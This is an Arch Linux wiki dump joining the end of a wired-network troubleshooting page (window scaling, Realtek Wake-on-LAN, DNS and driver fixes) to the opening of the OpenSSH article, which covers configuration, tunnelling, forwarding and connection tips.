Simply disable Window Scaling. Since Window Scaling is a nice TCP feature, it may be uncomfortable to disable it, especially if you cannot fix the broken router. There are several ways to disable Window Scaling, and it seems that the most bulletproof way (which will work with most kernels) is to add the following line to {{ic|/etc/sysctl.conf}} (see also [[sysctl]])<br />
<br />
net.ipv4.tcp_window_scaling = 0<br />
<br />
==== How to fix it (The best way) ====<br />
<br />
This problem is caused by broken routers/firewalls, so let's change them. Some users have reported that the broken router was their very own DSL router.<br />
<br />
==== More about it ====<br />
<br />
This section is based on the LWN article [http://lwn.net/Articles/92727/ TCP window scaling and broken routers] and a Kernel Trap article: [http://kerneltrap.org/node/6723 Window Scaling on the Internet].<br />
<br />
There are also several relevant threads on the LKML.<br />
<br />
=== Realtek no link / WOL problem ===<br />
<br />
Users with Realtek 8168 8169 8101 8111(C) based NICs (cards / and on-board) may notice a problem where the NIC seems to be disabled on boot and has no Link light. This can usually be found on a dual boot system where Windows is also installed. It seems that using the offical Realtek drivers (dated anything after May 2007) under Windows is the cause. These newer drivers disable the Wake-On-LAN feature by disabling the NIC at Windows shutdown time, where it will remain disabled until the next time Windows boots. You will be able to notice if this problem is affecting you if the Link light remains off until Windows boots up; during Windows shutdown the Link light will switch off. Normal operation should be that the link light is always on as long as the system is on, even during POST. This problem will also affect other operative systems without newer drivers (eg. Live CDs). Here are a few fixes for this problem:<br />
<br />
==== Method 1 - Rollback/change Windows driver ====<br />
<br />
You can roll back your Windows NIC driver to the Microsoft provided one (if available), or roll back/install an official Realtek driver pre-dating May 2007 (may be on the CD that came with your hardware).<br />
<br />
==== Method 2 - Enable WOL in Windows driver ====<br />
<br />
Probably the best and the fastest fix is to change this setting in the Windows driver. This way it should be fixed system-wide and not only under Arch (eg. live CDs, other operative systems). In Windows, under Device Manager, find your Realtek network adapter and double-click it. Under the Advanced tab, change "Wake-on-LAN after shutdown" to Enable.<br />
<br />
In Windows XP (example)<br />
Right click my computer<br />
--> Hardware tab<br />
--> Device Manager<br />
--> Network Adapters<br />
--> "double click" Realtek ...<br />
--> Advanced tab<br />
--> Wake-On-Lan After Shutdown<br />
--> Enable<br />
<br />
{{Note|Newer Realtek Windows drivers (tested with ''Realtek 8111/8169 LAN Driver v5.708.1030.2008'', dated 2009/01/22, available from GIGABYTE) may refer to this option slightly differently, like ''Shutdown Wake-On-LAN --> Enable''. It seems that switching it to {{ic|Disable}} has no effect (you will notice the Link light still turns off upon Windows shutdown). One rather dirty workaround is to boot to Windows and just reset the system (perform an ungraceful restart/shutdown) thus not giving the Windows driver a chance to disable LAN. The Link light will remain on and the LAN adapter will remain accessible after POST - that is until you boot back to Windows and shut it down properly again.}}<br />
<br />
==== Method 3 - Newer Realtek Linux driver ====<br />
<br />
Any newer driver for these Realtek cards can be found for Linux on the realtek site. (untested but believed to also solve the problem).<br />
<br />
==== Method 4 - Enable ''LAN Boot ROM'' in BIOS/CMOS ====<br />
<br />
It appears that setting ''Integrated Peripherals --> Onboard LAN Boot ROM --> Enabled'' in BIOS/CMOS reactivates the Realtek LAN chip on system boot-up, despite the Windows driver disabling it on OS shutdown.<br />
<br><small>This was tested successfully multiple times with GIGABYTE system board GA-G31M-ES2L with BIOS version F8 released on 2009/02/05. YMMV.</small><br />
<br />
=== DLink G604T/DLink G502T DNS problem ===<br />
<br />
Users with a DLink G604T/DLink G502T router, using DHCP and have firmware v2.00+ (typically users with AUS firmware) may have problems with certain programs not resolving the DNS. One of these programs are unfortunatley pacman. The problem is basically the router in certain situations is not sending the DNS properly to DHCP, which causes programs to try and connect to servers with an IP address of 1.0.0.0 and fail with a connection timed out error<br />
<br />
==== How to diagnose the problem ====<br />
<br />
The best way to diagnose the problem is to use Firefox/Konqueror/links/seamonkey and to enable wget for pacman. If this is a fresh install of Arch Linux, then you may want to consider installing {{ic|links}} through the live CD.<br />
<br />
Firstly, enable wget for pacman (since it gives us info about pacman when it is downloading packages)<br />
Open {{ic|/etc/pacman.conf}} with your favourite editor and uncomment the following line (remove the # if it is there)<br />
<br />
XferCommand=/usr/bin/wget --passive-ftp -c -O %o %u<br />
<br />
While you are editing {{ic|/etc/pacman.conf}}, check the default mirror that pacman uses to download packages.<br />
<br />
Now open up the default mirror in an Internet browser to see if the mirror actually works. If it does work, then do {{ic|pacman -Syy}} (otherwise pick another working mirror and set it to the pacman default). If you get something similar to the following (notice the 1.0.0.0),<br />
<br />
<nowiki>ftp://mirror.pacific.net.au/linux/archlinux/extra/os/i686/extra.db.tar.gz</nowiki><br />
=> '/var/lib/pacman/community.db.tar.gz.part'<br />
Resolving mirror.pacific.net.au... 1.0.0.0<br />
<br />
then you most likely have this problem. The 1.0.0.0 means it is unable to resolve DNS, so we must add it to {{ic|/etc/resolv.conf}}.<br />
<br />
==== How to fix it ====<br />
<br />
Basically what we need to do is to manually add the DNS servers to our {{ic|/etc/resolv.conf}} file. The problem is that DHCP automatically deletes and replaces this file on boot, so we need to edit {{ic|/etc/conf.d/dhcpcd}} and change the flags to stop DHCP from doing this.<br />
<br />
When you open {{ic|/etc/conf.d/dhcpcd}}, you should see something close to the following:<br />
<br />
DHCPCD_ARGS="-t 30 -h $HOSTNAME"<br />
<br />
Add the {{ic|-R}} flag to the arguments, e.g.,<br />
<br />
DHCPCD_ARGS="-R -t 30 -h $HOSTNAME"<br />
<br />
{{Note|1=If you are using {{Pkg|dhcpcd}} >= 4.0.2, the {{ic|-R}} flag has been deprecated. Please see the [[#For DHCP assigned IP address]] section for information on how to use a custom {{ic|/etc/resolv.conf}} file.}}<br />
<br />
Save and close the file; now open {{ic|/etc/resolv.conf}}. You should see a single nameserver (most likely 10.1.1.1). This is the gateway to your router, which we need to connect to in order to get the DNS servers of your ISP. Paste the IP address into your browser and log in to your router. Go to the DNS section, and you should see an IP address in the Primary DNS Server field; copy it and paste it as a nameserver '''ABOVE''' the current gateway one.<br />
<br />
For example, {{ic|/etc/resolv.conf}} should look something along the lines of:<br />
<br />
nameserver 10.1.1.1<br />
<br />
If my primary DNS server is 211.29.132.12, then change {{ic|/etc/resolv.conf}} to:<br />
<br />
nameserver 211.29.132.12<br />
nameserver 10.1.1.1<br />
<br />
Now restart the network daemon by running {{ic|systemctl restart dhcpcd@<interface>}} and do {{ic|pacman -Syy}}. If it syncs correctly with the server, then the problem is solved.<br />
<br />
==== More about it ====<br />
<br />
This is the whirlpool forum (Australian ISP community) which talks about and gives the same solution to the problem:<br />
<br />
http://forums.whirlpool.net.au/forum-replies-archive.cfm/461625.html<br />
<br />
=== Check DHCP problem by releasing IP first ===<br />
<br />
Problem may occur when DHCP get wrong IP assignment. For example when two routers are tied together through VPN. The router that is connected to me by VPN may assigning IP address. To fix it. On a console, as root, release IP address:<br />
<br />
# dhcpcd -k<br />
<br />
Then request a new one:<br />
<br />
# dhcpcd<br />
<br />
Maybe you had to run those two commands many times.<br />
<br />
<br />
=== No eth0 with Atheros AR8161 ===<br />
<br />
''Note: With the 3.10.2-1-ARCH kernel update, the alx ethernet driver module is included in the package.''<br />
<br />
With the Atheros AR8161 Gigabit Ethernet card, the ethernet connection is not working out-of-the-box (with the installation media of March 2013). The module "alx" needs to be loaded but is not present.<br />
<br />
The driver from [http://linuxwireless.org/en/users/Download/stable/#compat-wireless_stable_releases compat-wireless] (that has become [https://backports.wiki.kernel.org/index.php/Releases compat-drives] since linux 3.7) need to be installed. The "-u" postfix annotates that Qualcomm have applied a driver under a unified driver.<br />
$ wget https://www.kernel.org/pub/linux/kernel/projects/backports/2013/03/28/compat-drivers-2013-03-28-5-u.tar.bz2<br />
$ tar xjf compat*<br />
$ cd compat*<br />
$ ./scripts/driver-select alx<br />
$ make<br />
$ sudo make install<br />
$ sudo modprobe alx<br />
<br />
The alx driver has not been added to Linux kernel due to various problems. Compatibility between the different kernel versions has been spotty. For better support follow the [http://lists.infradead.org/mailman/listinfo/unified-drivers mailing list]and [http://www.linuxfoundation.org/collaborate/workgroups/networking/alx alx page]for latest working solution for alx.<br />
<br />
The driver must be built and installed after every kernel change.<br />
<br />
Alternatively you can use the AUR package for [https://aur.archlinux.org/packages/compat-drivers-patched/ compat drivers], which installs many other drivers.<br />
<br />
=== No eth0 with Atheros AR9485 ===<br />
<br />
The ethernet (eth0) for Atheros AR9485 are not working out-of-the-box (with installation media of March 2013). The working solution for this is to install the package [https://aur.archlinux.org/packages/compat-drivers-patched/ compat-drivers-patched] from AUR.<br />
<br />
=== No carrier / no connection after suspend ===<br />
After suspend to RAM no connection is found although the network cable is plugged in. <br />
This may be caused by PCI power management. What is the output of<br />
<br />
# ip link show eth0<br />
<br />
If the line contains "NO-CARRIER" even though there's a cable connected to your eth0 port, it is possible that the device was auto-suspended and the media sense feature doesn't work. To solve this, first you need to find your ethernet controllers PCI address by<br />
<br />
# lspci<br />
<br />
This should look similar to this:<br />
<br />
...<br />
00:19.0 Ethernet controller: Intel Corporation 82577LM Gigabit Network Connection (rev 06)<br />
...<br />
<br />
So the address is 00:19.0.<br />
Now check the PM status of the device by issuing<br />
<br />
# cat "/sys/bus/pci/devices/0000:00:19.0/power/control"<br />
<br />
substituting 00:19.0 with the address obtained from lspci.<br />
If the output reads "auto", you can try to bring the device out of suspend by<br />
<br />
# echo on > "/sys/bus/pci/devices/0000:00:19.0/power/control"<br />
<br />
Don't forget to substitute the address again.<br />
<br />
{{Note|1=This appears to be a bug in kernel 3.8.4.1- (3.8.8.1 is still affected): [https://bbs.archlinux.org/viewtopic.php?id=159837&p=2 Forum discussion.] It also appears a fix is [https://lkml.org/lkml/2013/1/18/147 on the way. (It will be likely fixed in 3.9.)] In the meantime, the above is a suitable workaround.}}<br />
<br />
=== PC Pingable by IP but not by hostname? ===<br />
This issue hunted me for months! Turns out to be a very simple fix IF you are using samba as well. Usually people only start smbd which is enough for network access to work, but does not advocate the pc's name to the router. nmbd is doing that so you should always have:<br />
systemctl enable smbd.service<br />
systemctl enable nmbd.service<br />
<br />
Which makes them run at startup. If you don't want to restart then you can start then right away with:<br />
systemctl start smbd.service<br />
systemctl start nmbd.service<br />
<br />
And that makes the computer available by name on the network.</div>Wakehttps://wiki.archlinux.org/index.php?title=OpenSSH&diff=251933OpenSSH2013-03-25T18:31:35Z<p>Wake: This is not a shell howto. rm use of /etc/rc.local.shutdown. rm dup info.</p>
<hr />
<div>[[Category:Secure Shell]]<br />
[[es:Secure Shell]]<br />
[[de:SSH]]<br />
[[fr:ssh]]<br />
[[it:Secure Shell]]<br />
[[ko:Secure Shell]]<br />
[[pl:Secure Shell]]<br />
[[pt:Secure Shell]]<br />
[[ru:Secure Shell]]<br />
[[sr:Secure Shell]]<br />
[[zh-CN:Secure Shell]]<br />
'''Secure Shell''' ('''SSH''') is a network protocol that allows data to be exchanged over a secure channel between two computers. Encryption provides confidentiality and integrity of data. SSH uses public-key cryptography to authenticate the remote computer and allow the remote computer to authenticate the user, if necessary.<br />
<br />
SSH is typically used to log into a remote machine and execute commands, but it also supports tunneling, forwarding arbitrary TCP ports and X11 connections; file transfer can be accomplished using the associated SFTP or SCP protocols.<br />
<br />
An SSH server, by default, listens on the standard TCP port 22. An SSH client program is typically used for establishing connections to an ''sshd'' daemon accepting remote connections. Both are commonly present on most modern operating systems, including Mac OS X, GNU/Linux, Solaris and OpenVMS. Proprietary, freeware and open source versions of various levels of complexity and completeness exist.<br />
<br />
(Source: [[Wikipedia:Secure Shell]])<br />
<br />
== OpenSSH ==<br />
OpenSSH (OpenBSD Secure Shell) is a set of computer programs providing encrypted communication sessions over a computer network using the ssh protocol. It was created as an open source alternative to the proprietary Secure Shell software suite offered by SSH Communications Security. OpenSSH is developed as part of the OpenBSD project, which is led by Theo de Raadt.<br />
<br />
OpenSSH is occasionally confused with the similarly-named OpenSSL; however, the projects have different purposes and are developed by different teams, the similar name is drawn only from similar goals.<br />
<br />
=== Installing OpenSSH ===<br />
[[pacman|Install]] {{Pkg|openssh}} from the [[official repositories]].<br />
<br />
=== Configuring SSH ===<br />
====Client====<br />
The SSH client configuration file is {{ic|/etc/ssh/ssh_config}} or {{ic|~/.ssh/config}}.<br />
<br />
An example configuration: <br />
<br />
{{hc|/etc/ssh/ssh_config|<br />
# $OpenBSD: ssh_config,v 1.26 2010/01/11 01:39:46 dtucker Exp $<br />
<br />
# This is the ssh client system-wide configuration file. See<br />
# ssh_config(5) for more information. This file provides defaults for<br />
# users, and the values can be changed in per-user configuration files<br />
# or on the command line.<br />
<br />
# Configuration data is parsed as follows:<br />
# 1. command line options<br />
# 2. user-specific file<br />
# 3. system-wide file<br />
# Any configuration value is only changed the first time it is set.<br />
# Thus, host-specific definitions should be at the beginning of the<br />
# configuration file, and defaults at the end.<br />
<br />
# Site-wide defaults for some commonly used options. For a comprehensive<br />
# list of available options, their meanings and defaults, please see the<br />
# ssh_config(5) man page.<br />
<br />
# Host *<br />
# ForwardAgent no<br />
# ForwardX11 no<br />
# RhostsRSAAuthentication no<br />
# RSAAuthentication yes<br />
# PasswordAuthentication yes<br />
# HostbasedAuthentication no<br />
# GSSAPIAuthentication no<br />
# GSSAPIDelegateCredentials no<br />
# BatchMode no<br />
# CheckHostIP yes<br />
# AddressFamily any<br />
# ConnectTimeout 0<br />
# StrictHostKeyChecking ask<br />
# IdentityFile ~/.ssh/identity<br />
# IdentityFile ~/.ssh/id_rsa<br />
# IdentityFile ~/.ssh/id_dsa<br />
# Port 22<br />
# Protocol 2,1<br />
# Cipher 3des<br />
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc<br />
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160<br />
# EscapeChar ~<br />
# Tunnel no<br />
# TunnelDevice any:any<br />
# PermitLocalCommand no<br />
# VisualHostKey no<br />
# ProxyCommand ssh -q -W %h:%p gateway.example.com<br />
}}<br />
<br />
It is recommended to change the Protocol line into this:<br />
Protocol 2<br />
<br />
That means that only Protocol 2 will be used, since Protocol 1 is considered somewhat insecure.<br />
<br />
====Daemon====<br />
The SSH daemon configuration file can be found and edited in {{ic|/etc/ssh/ssh'''d'''_config}}.<br />
<br />
An example configuration: <br />
<br />
{{hc|/etc/ssh/sshd_config|2=<br />
# $OpenBSD: sshd_config,v 1.82 2010/09/06 17:10:19 naddy Exp $<br />
<br />
# This is the sshd server system-wide configuration file. See<br />
# sshd_config(5) for more information.<br />
<br />
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin<br />
<br />
# The strategy used for options in the default sshd_config shipped with<br />
# OpenSSH is to specify options with their default value where<br />
# possible, but leave them commented. Uncommented options change a<br />
# default value.<br />
<br />
#Port 22<br />
#AddressFamily any<br />
#ListenAddress 0.0.0.0<br />
#ListenAddress ::<br />
<br />
# The default requires explicit activation of protocol 1<br />
#Protocol 2<br />
<br />
# HostKey for protocol version 1<br />
#HostKey /etc/ssh/ssh_host_key<br />
# HostKeys for protocol version 2<br />
#HostKey /etc/ssh/ssh_host_rsa_key<br />
#HostKey /etc/ssh/ssh_host_dsa_key<br />
#HostKey /etc/ssh/ssh_host_ecdsa_key<br />
<br />
# Lifetime and size of ephemeral version 1 server key<br />
#KeyRegenerationInterval 1h<br />
#ServerKeyBits 1024<br />
<br />
# Logging<br />
# obsoletes QuietMode and FascistLogging<br />
#SyslogFacility AUTH<br />
#LogLevel INFO<br />
<br />
# Authentication:<br />
<br />
#LoginGraceTime 2m<br />
#PermitRootLogin yes<br />
#StrictModes yes<br />
#MaxAuthTries 6<br />
#MaxSessions 10<br />
<br />
#RSAAuthentication yes<br />
#PubkeyAuthentication yes<br />
#AuthorizedKeysFile .ssh/authorized_keys<br />
<br />
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts<br />
#RhostsRSAAuthentication no<br />
# similar for protocol version 2<br />
#HostbasedAuthentication no<br />
# Change to yes if you do not trust ~/.ssh/known_hosts for<br />
# RhostsRSAAuthentication and HostbasedAuthentication<br />
#IgnoreUserKnownHosts no<br />
# Don't read the user's ~/.rhosts and ~/.shosts files<br />
#IgnoreRhosts yes<br />
<br />
# To disable tunneled clear text passwords, change to no here!<br />
#PasswordAuthentication yes<br />
#PermitEmptyPasswords no<br />
<br />
# Change to no to disable s/key passwords<br />
ChallengeResponseAuthentication no<br />
<br />
# Kerberos options<br />
#KerberosAuthentication no<br />
#KerberosOrLocalPasswd yes<br />
#KerberosTicketCleanup yes<br />
#KerberosGetAFSToken no<br />
<br />
# GSSAPI options<br />
#GSSAPIAuthentication no<br />
#GSSAPICleanupCredentials yes<br />
<br />
# Set this to 'yes' to enable PAM authentication, account processing, <br />
# and session processing. If this is enabled, PAM authentication will <br />
# be allowed through the ChallengeResponseAuthentication and<br />
# PasswordAuthentication. Depending on your PAM configuration,<br />
# PAM authentication via ChallengeResponseAuthentication may bypass<br />
# the setting of "PermitRootLogin without-password".<br />
# If you just want the PAM account and session checks to run without<br />
# PAM authentication, then enable this but set PasswordAuthentication<br />
# and ChallengeResponseAuthentication to 'no'.<br />
UsePAM yes<br />
<br />
#AllowAgentForwarding yes<br />
#AllowTcpForwarding yes<br />
#GatewayPorts no<br />
#X11Forwarding no<br />
#X11DisplayOffset 10<br />
#X11UseLocalhost yes<br />
#PrintMotd yes<br />
#PrintLastLog yes<br />
#TCPKeepAlive yes<br />
#UseLogin no<br />
#UsePrivilegeSeparation yes<br />
#PermitUserEnvironment no<br />
#Compression delayed<br />
#ClientAliveInterval 0<br />
#ClientAliveCountMax 3<br />
#UseDNS yes<br />
#PidFile /var/run/sshd.pid<br />
#MaxStartups 10<br />
#PermitTunnel no<br />
#ChrootDirectory none<br />
<br />
# no default banner path<br />
#Banner none<br />
<br />
# override default of no subsystems<br />
Subsystem sftp /usr/lib/ssh/sftp-server<br />
<br />
# Example of overriding settings on a per-user basis<br />
#Match User anoncvs<br />
# X11Forwarding no<br />
# AllowTcpForwarding no<br />
# ForceCommand cvs server<br />
}}<br />
<br />
To allow access only for some users add this line:<br />
AllowUsers user1 user2<br />
<br />
To disable root login over SSH, change the PermitRootLogin line into this:<br />
PermitRootLogin no<br />
<br />
To add a nice welcome message edit the file {{ic|/etc/issue}} and change the Banner line into this:<br />
Banner /etc/issue<br />
<br />
{{Tip| You may want to change the default port from 22 to any higher port (see [http://en.wikipedia.org/wiki/Security_through_obscurity security through obscurity]).}} <br />
<br />
Even though the port ssh is running on could be detected by using a port-scanner like nmap, changing it will reduce the number of log entries caused by automated authentication attempts. To help select a port review the [[Wikipedia:List of TCP and UDP port numbers|list of TCP and UDP port numbers]].<br />
<br />
{{Tip|Disabling password logins entirely will greatly increase security, see [[SSH Keys]] for more information.}}<br />
<br />
=== Managing the sshd daemon ===<br />
You can start the sshd daemon with the following command:<br />
# systemctl start sshd<br />
<br />
You can enable the sshd daemon at startup with the following command:<br />
# systemctl enable sshd.service<br />
<br />
{{Warning|Systemd is an asynchronous starting process. If you bind the SSH daemon to a specific IP address {{ic|ListenAddress 192.168.1.100}} it may fail to load during boot since the default sshd.service unit file has no dependency on network interfaces being enabled. When binding to an IP address, you will need to add {{ic|After&#61;network.target}} to a custom sshd.service unit file. See [[Systemd#Replacing provided unit files]].}}<br />
<br />
Or you can enable SSH Daemon socket so the daemon is started on the first incoming connection:<br />
# systemctl enable sshd.socket<br />
If you use a different port than the default 22, you have to set "ListenStream" in the unit file (/lib/systemd/system/sshd.socket) to the appropriate port.<br />
<br />
=== Connecting to the server ===<br />
To connect to a server, run:<br />
$ ssh -p port user@server-address<br />
<br />
== Other SSH clients and servers ==<br />
Apart from OpenSSH, there are many SSH [[Wikipedia:Comparison of SSH clients|clients]] and [[Wikipedia:Comparison of SSH servers|servers]] avaliable.<br />
<br />
=== Dropbear ===<br />
[[Wikipedia:Dropbear (software)|Dropbear]] is a SSH-2 client and server. {{AUR|dropbear}} is available in the [[AUR]].<br />
<br />
The commandline ssh client is named dbclient.<br />
<br />
=== SSH alternative: Mobile Shell - responsive, survives disconnects ===<br />
From the Mosh [http://mosh.mit.edu/ website]:<br />
<br />
Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes. Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links.<br />
<br />
[[pacman|Install]] {{Pkg|mosh}} from the [[official repositories]] or the latest revision {{AUR|mosh-git}} in the [[AUR]].<br />
<br />
== Tips and tricks ==<br />
<br />
=== Encrypted SOCKS tunnel ===<br />
This is highly useful for laptop users connected to various unsafe wireless connections. The only thing you need is an SSH server running at a somewhat secure location, like your home or at work. It might be useful to use a dynamic DNS service like [http://www.dyndns.org/ DynDNS] so you do not have to remember your IP-address.<br />
<br />
==== Step 1: start the connection ====<br />
You only have to execute this single command to start the connection:<br />
$ ssh -ND 4711 user@host<br />
where {{Ic|"user"}} is your username at the SSH server running at the {{Ic|"host"}}. It will ask for your password, and then you're connected! The {{Ic|"N"}} flag disables the interactive prompt, and the {{Ic|"D"}} flag specifies the local port on which to listen on (you can choose any port number if you want).<br />
<br />
It's nice to add the verbose {{Ic|"-v"}} flag, because then you can verify that it's actually connected from that output.<br />
<br />
==== Step 2: configure your browser (or other programs) ====<br />
The above step is completely useless if you do not configure your web browser (or other programs) to use this newly created socks tunnel. Since the current version of SSH supports both SOCKS4 and SOCKS5, you can use either of them.<br />
<br />
* For Firefox: ''Edit &rarr; Preferences &rarr; Advanced &rarr; Network &rarr; Connection &rarr; Setting'':<br />
: Check the ''"Manual proxy configuration"'' radio button, and enter "localhost" in the ''"SOCKS host"'' text field, and then enter your port number in the next text field (I used 4711 above).<br />
<br />
Firefox does not automatically make DNS requests through the socks tunnel. This potential privacy concern can be mitigated by the following steps:<br />
<br />
# Type about:config into the Firefox location bar.<br />
# Search for network.proxy.socks_remote_dns<br />
# Set the value to true.<br />
# Restart the browser.<br />
<br />
* For Chromium: You can set the SOCKS settings as environment variables or as command line options. I recommend to add one of the following functions to your {{ic|.bashrc}}:<br />
function secure_chromium {<br />
port=4711<br />
export SOCKS_SERVER=localhost:$port<br />
export SOCKS_VERSION=5<br />
chromium &<br />
exit<br />
}<br />
OR<br />
function secure_chromium {<br />
port=4711<br />
chromium --proxy-server="socks://localhost:$port" &<br />
exit<br />
}<br />
<br />
Now open a terminal and just do:<br />
$ secure_chromium<br />
<br />
Enjoy your secure tunnel!<br />
<br />
=== X11 forwarding ===<br />
To run graphical programs through a SSH connection you can enable X11 forwarding. An option needs to be set in the configuration files on the server and client (here "client" means your (desktop) machine your X11 Server runs on, and you will run X applications on the "server").<br />
<br />
[[pacman|Install]] {{Pkg|xorg-xauth}} from the [[official repositories]] onto the server.<br />
<br />
* Enable the '''AllowTcpForwarding''' option in {{ic|ssh'''d'''_config}} on the '''server'''.<br />
* Enable the '''X11Forwarding''' option in {{ic|ssh'''d'''_config}} on the '''server'''.<br />
* Set the '''X11DisplayOffset''' option in {{ic|ssh'''d'''_config}} on the '''server''' to 10.<br />
* Enable the '''X11UseLocalhost''' option in {{ic|ssh'''d'''_config}} on the '''server'''.<br />
Also:<br />
* Enable the '''ForwardX11''' option in {{ic|ssh_config}} on the '''client'''.<br />
* Enable the '''ForwardX11Trusted''' if gui is drawing badly.<br />
<br />
You need to restart the ssh daemon on the server for these changes to take effect, of course.<br />
<br />
To use the forwarding, log on to your server through ssh:<br />
$ ssh -X -p port user@server-address<br />
If you receive errors trying to run graphical applications try trusted forwarding instead:<br />
$ ssh -Y -p port user@server-address<br />
You can now start any X program on the remote server, the output will be forwarded to your local session:<br />
$ xclock<br />
<br />
<br />
If you get "Cannot open display" errors try the following command as the non root user:<br />
$ xhost +<br />
<br />
the above command will allow anybody to forward X11 applications. To restrict forwarding to a particular host type:<br />
$ xhost +hostname<br />
<br />
where hostname is the name of the particular host you want to forward to. Type "man xhost" for more details.<br />
<br />
Be careful with some applications as they check for a running instance on the local machine. Firefox is an example. Either close running Firefox or use the following start parameter to start a remote instance on the local machine<br />
$ firefox -no-remote<br />
<br />
If you get "X11 forwarding request failed on channel 0" when you connect (and the server /var/log/errors.log shows "Failed to allocate internet-domain X11 display socket"), try to either<br />
* Enable the '''AddressFamily any''' option in {{ic|ssh'''d'''_config}} on the '''server''', or<br />
* Set the '''AddressFamily''' option in {{ic|ssh'''d'''_config}} on the '''server''' to inet.<br />
Setting it to inet may fix problems with Ubuntu clients on IPv4.<br />
<br />
=== Forwarding other ports ===<br />
In addition to SSH's built-in support for X11, it can also be used to securely tunnel any TCP connection, by use of local forwarding or remote forwarding.<br />
<br />
Local forwarding opens a port on the local machine, connections to which will be forwarded to the remote host and from there on to a given destination. Very often, the forwarding destination will be the same as the remote host, thus providing a secure shell and, e.g. a secure VNC connection, to the same machine. Local forwarding is accomplished by means of the {{Ic|-L}} switch and it's accompanying forwarding specification in the form of {{Ic|<tunnel port>:<destination address>:<destination port>}}.<br />
<br />
Thus:<br />
<br />
$ ssh -L 1000:mail.google.com:25 192.168.0.100<br />
<br />
will use SSH to login to and open a shell on 192.168.0.100, and will also create a tunnel from the local machine's TCP port 1000 to mail.google.com on port 25. Once established, connections to localhost:1000 will connect to the Gmail SMTP port. To Google, it will appear that any such connection (though not necessarily the data conveyed over the connection) originated from 192.168.0.100, and such data will be secure as between the local machine and 192.168.0.100, but not between 192.168.0.100, unless other measures are taken.<br />
<br />
Similarly:<br />
<br />
$ ssh -L 2000:192.168.0.100:6001 192.168.0.100<br />
<br />
will allow connections to localhost:2000 which will be transparently sent to the remote host on port 6001. The preceding example is useful for VNC connections using the vncserver utility--part of the tightvnc package--which, though very useful, is explicit about its lack of security.<br />
<br />
Remote forwarding allows the remote host to connect to an arbitrary host via the SSH tunnel and the local machine, providing a functional reversal of local forwarding, and is useful for situations where, e.g., the remote host has limited connectivity due to firewalling. It is enabled with the {{Ic|-R}} switch and a forwarding specification in the form of {{Ic|<tunnel port>:<destination address>:<destination port>}}.<br />
<br />
Thus:<br />
<br />
$ ssh -R 3000:irc.freenode.net:6667 192.168.0.200<br />
<br />
will bring up a shell on 192.168.0.200, and connections from 192.168.0.200 to itself on port 3000 (remotely speaking, localhost:3000) will be sent over the tunnel to the local machine and then on to irc.freenode.net on port 6667, thus, in this example, allowing the use of IRC programs on the remote host to be used, even if port 6667 would normally be blocked to it.<br />
<br />
Both local and remote forwarding can be used to provide a secure "gateway," allowing other computers to take advantage of an SSH tunnel, without actually running SSH or the SSH daemon by providing a bind-address for the start of the tunnel as part of the forwarding specification, e.g. {{Ic|<tunnel address>:<tunnel port>:<destination address>:<destination port>}}. The {{Ic|<tunnel address>}} can be any address on the machine at the start of the tunnel, {{Ic|localhost}}, {{Ic|*}} (or blank), which, respectively, allow connections via the given address, via the loopback interface, or via any interface. By default, forwarding is limited to connections from the machine at the "beginning" of the tunnel, i.e. the {{Ic|<tunnel address>}} is set to {{Ic|localhost}}. Local forwarding requires no additional configuration, however remote forwarding is limited by the remote server's SSH daemon configuration. See the {{Ic|GatewayPorts}} option in {{Ic|sshd_config(5)}} for more information.<br />
<br />
=== Speeding up SSH ===<br />
You can make all sessions to the same host use a single connection, which will greatly speed up subsequent logins, by adding these lines under the proper host in {{ic|/etc/ssh/ssh_config}}:<br />
ControlMaster auto<br />
ControlPath ~/.ssh/socket-%r@%h:%p<br />
<br />
Changing the ciphers used by SSH to less cpu-demanding ones can improve speed. In this aspect, the best choices are arcfour and blowfish-cbc. '''Please do not do this unless you know what you are doing; arcfour has a number of known weaknesses'''. To use them, run SSH with the {{Ic|"c"}} flag, like this:<br />
$ ssh -c arcfour,blowfish-cbc user@server-address<br />
To use them permanently, add this line under the proper host in {{ic|/etc/ssh/ssh_config}}:<br />
Ciphers arcfour,blowfish-cbc<br />
Another option to improve speed is to enable compression with the {{Ic|"C"}} flag. A permanent solution is to add this line under the proper host in {{ic|/etc/ssh/ssh_config}}:<br />
Compression yes<br />
Login time can be shorten by using the {{Ic|"4"}} flag, which bypasses IPv6 lookup. This can be made permanent by adding this line under the proper host in {{ic|/etc/ssh/ssh_config}}:<br />
AddressFamily inet<br />
Another way of making these changes permanent is to create an alias in {{ic|~/.bashrc}}:<br />
alias ssh='ssh -C4c arcfour,blowfish-cbc'<br />
<br />
=== Mounting a remote filesystem with SSHFS ===<br />
Please refer to the [[Sshfs]] article to use sshfs to mount a remote system - accessible via SSH - to a local folder, so you will be able to do any operation on the mounted files with any tool (copy, rename, edit with vim, etc.). Using sshfs instead of shfs is generally preferred as a new version of shfs hasn't been released since 2004.<br />
<br />
=== Keep alive ===<br />
Your ssh session will automatically log out if it is idle. To keep the connection active (alive) add this to {{ic|~/.ssh/config}} or to {{ic|/etc/ssh/ssh_config}} on the client.<br />
<br />
ServerAliveInterval 120<br />
<br />
This will send a "keep alive" signal to the server every 120 seconds.<br />
<br />
Conversely, to keep incoming connections alive, you can set<br />
<br />
ClientAliveInterval 120<br />
<br />
(or some other number greater than 0) in {{ic|/etc/ssh/sshd_config}} on the server.<br />
<br />
=== Saving connection data in ssh config ===<br />
Whenever you want to connect to a ssh server, you usually have to type at least its address and the username. To save that typing work for servers you regularly connect to, you can use the personal {{ic|$HOME/.ssh/config}} or the global {{ic|/etc/ssh/ssh_config}} files as shown in the following example:<br />
<br />
{{hc|$HOME/.ssh/config|<br />
Host myserver<br />
HostName 123.123.123.123<br />
Port 12345<br />
User bob<br />
Host other_server<br />
HostName test.something.org<br />
User alice<br />
CheckHostIP no<br />
Cipher blowfish<br />
}}<br />
<br />
Now you can simply connect to the server by using the name you specified:<br />
<br />
$ ssh myserver<br />
<br />
To see a complete list of the possible options, check out ssh_config's manpage on your system or the [http://www.openbsd.org/cgi-bin/man.cgi?query=ssh_config ssh_config documentation] on the official website.<br />
<br />
=== Autossh - automatically restarts SSH sessions and tunnels ===<br />
